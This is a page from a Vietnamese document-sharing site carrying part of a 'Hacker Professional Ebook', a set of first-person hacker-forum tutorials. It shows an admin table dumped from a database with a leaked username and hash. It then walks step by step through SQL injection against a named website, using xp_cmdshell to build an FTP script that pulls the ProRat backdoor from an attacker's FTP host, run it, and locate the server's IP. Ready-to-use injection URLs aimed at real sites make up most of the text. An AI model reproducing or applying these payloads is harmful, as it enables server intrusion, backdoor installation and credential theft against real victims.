1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 216 pps

6 116 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 92,75 KB

Nội dung

Phần này có chức năng show ra table và column nếu như bạn biết login và password của CSDL (cái ở trong file dbconfig.php đó) Giờ chỉ việc thay user và pass mà ta kiếm được ở trên vào và show : Có gì nào , tables và column của database show ra hết hehe Kéo lui xuống dưới tìm table của admin : Trích: | - xhp_users | - id | - username | - password | - session_id | - first_name | - last_name Có trong tay tên các table và thông tin về CSDL rồi ta query table admin để tìm user và pass : Có gì nào : id ; username ; password ; session_id Trích: admin 1004munkmunk1968 5ba8d1b662edeed1cd304ac98b62fde3 Rồi vô trang chủ vào phần admin để login vào Còn đây là cái Cpanel hehe : Trích: http://www.leonida.ro/hacked.htm Dondoc(vniss) Up back door khi co' DBO, lay tu Nha truyen thong :D Tác giả: famydmx, post trong Vniss cũ, bài viết khá rõ ràng và dễ hiểu. Chào các bạn, tui chỉ là 1 newbie ở đây thui. Trước đây tui cũng thắc mắc về cách upload backdoor lên server dữ lắm. Sau khi vào Matrix để học hỏi thì vừa rùi tui đã up được 1 con lên server, hehe. Tui sẽ post quá trình upload mà tui đã làm để mọi người tham khảo (site là www.naame.com và backdoor tui đã up là ProRat 1.8) Bạn phải chuẩn bị sẵn 1 account FTP chứa backdoor mà mình muốn up lên (như netcat hay con ProRat mà tui đang dùng chẳng hạn). Bạn có thể tạo tại site www.esmartweb.com. Log in vào account đó sau đó click vào link Enable FTP access rồi dùng ftp để up backdoor lên (username và password mà bạn đã đăng ký, địa chỉ ftpserver lấy từ mail nó gởi cho bạn). Tui đã tạo sẵn 1 account như vậy : username : hyunjlove password : password ftpserver : ftpserver.esmartdesign.com Đầu tiên xác định user hiện tại có phải là dbo (chủ của database) không ? Hình như là chỉ có dbo mới được dùng master xp_cmdshell để up backdoor lên, tui không biết các user khác dbo có dùng được không nữa, hihi. Các đoạn code thêm vào đều nằm sau : http://www.naame.com/whois1.asp?from rstpage&dname= http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname='%20o r%201=convert(int,user_name()) sp_password Nó sẽ báo lỗi như vầy : Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'dbo' to a column of data type int. /includeFiles/whois1.asp, line 27 user hiện tại đúng là dbo! Tiếp theo sẽ tạo 1 kịch bản trên server để up, file script tui sẽ tạo tên là s có nội dung như sau : open ftpserver.esmartdesign.com user hyunjlove password bin get accsvr.exe quit hyunjlove và password chính là username và password của tui, accsvr.exe là con backdoor của tui. Để tạo script trên bạn lần lượt đánh vào các URL sau : http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20open%20ftpserver .esmartdesign.com%20>>s' sp_password http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20user%20hyunjlove %20password%20>>s' sp_password http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20bin%20>>s' sp_password http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20get%20accsvr.exe %20>>s' sp_password http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'echo%20quit%20>>s' sp_password Chạy ftp trên server để lấy backdoor về : http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'ftp%20-v%20-i%20-n%20-s:s' sp_password Chờ 5 phút! hehe. - Chạy con backdoor trên server như sau : http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';exe c%20master xp_cmdshell%20'accsvr.exe' sp_password - Hehe, việc còn lại là cần tìm là tìm địa chỉ IP của cái server mình vừa upload lên (thường thì server chạy SQL Server nằm cùng với host của site đó nhưng mà trường hợp này thì hic hic, nó nằm ở chỗ khác!). http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname=';cre ate%20table%20systablesz(a%20int%20identity,b%20va rchar(1000))%20insert%20into%20systablesz%20exec%2 0master xp_cmdshell%20'ipconfig' sp_password http://www.naame.com/whois1.asp?fromFirstPage=fromfirstpage&dname='%20o r%201=convert(int,(select%20top%201%20b%20from%20s ystablesz%20where%20b%20like%20'%25IP Address%25')) sp_password Nó sẽ hiện thông báo lỗi như thế này : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 65.210.194.10 ' to a column of data type int. Vậy là IP của server là 65.210.194.10 - Connect vào server : Vào google search "ProRat v1.8 download", down con này về. Chạy file prorat.exe, gõ IP vào rùi click nút connect thế là vào được server, tiếc rằng trong này chẳng có gì hay cả. by famydmx SQL Injection Tutorial //********************// //*******INTRO:*******// //********************// • Hầu hết các chương trình ứng dụng web mới đều dựa trên cấu trúc dữ liệu động để để đạt được tính hấp dẫn của các chương trình desktop cổ điển. Cơ chế động này đạt được bằng cách thu thập dữ liệu từ 1 database. Một trong những nền database phổ biến hơn cả trong các ứng dụng e-shop là SQL. Rất nhiều các ứng dụng web chỉ dựa hoàn toàn vào những scripts ở đầu vào ( phía người dùng - client ), những đoạn scripts này chỉ đơn giản là truy vấn 1 SQL database nằm ở ngay trên webserver hay nằm trên 1 hệ thống đầu cuối ( phía server ) riêng biệt. Một trong những cách tấn công khó bị nhận thấy và nguy hiểm nhất lên 1 ứng dụng web bao gồm việc chiếm đoạt những chuỗi truy vấn được dùng bởi các scripts, để đoạt quyền điểu khiển ứng dụng đó hoặc các dữ liệu của nó. Một trong những cơ chế hiệu quả nhất để đạt được điều đó là một kỹ thuật gọi là SQL injection ( kỹ thuật chèn những câu lệnh SQL ) //********************// //*****CONTENTS:******// //********************// Cơ sở dữ liệu là trái tim của một website thương mại. Một cuộc tấn công vào server lưu giữ CSDL có thể gây ra thất thoát lớn về tài chính cho công ty. Thông thường CSDL bị hack để lấy các thông tin về thẻ tín dụng. Chỉ cần một cuộc tấn công sẽ làm giảm uy tín và lượng khách hàng bởi vì họ muốn thông tin về CC của mình được an toàn. Hầu hết các website thương mại dùng Microsoft SQL (MSSql)

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN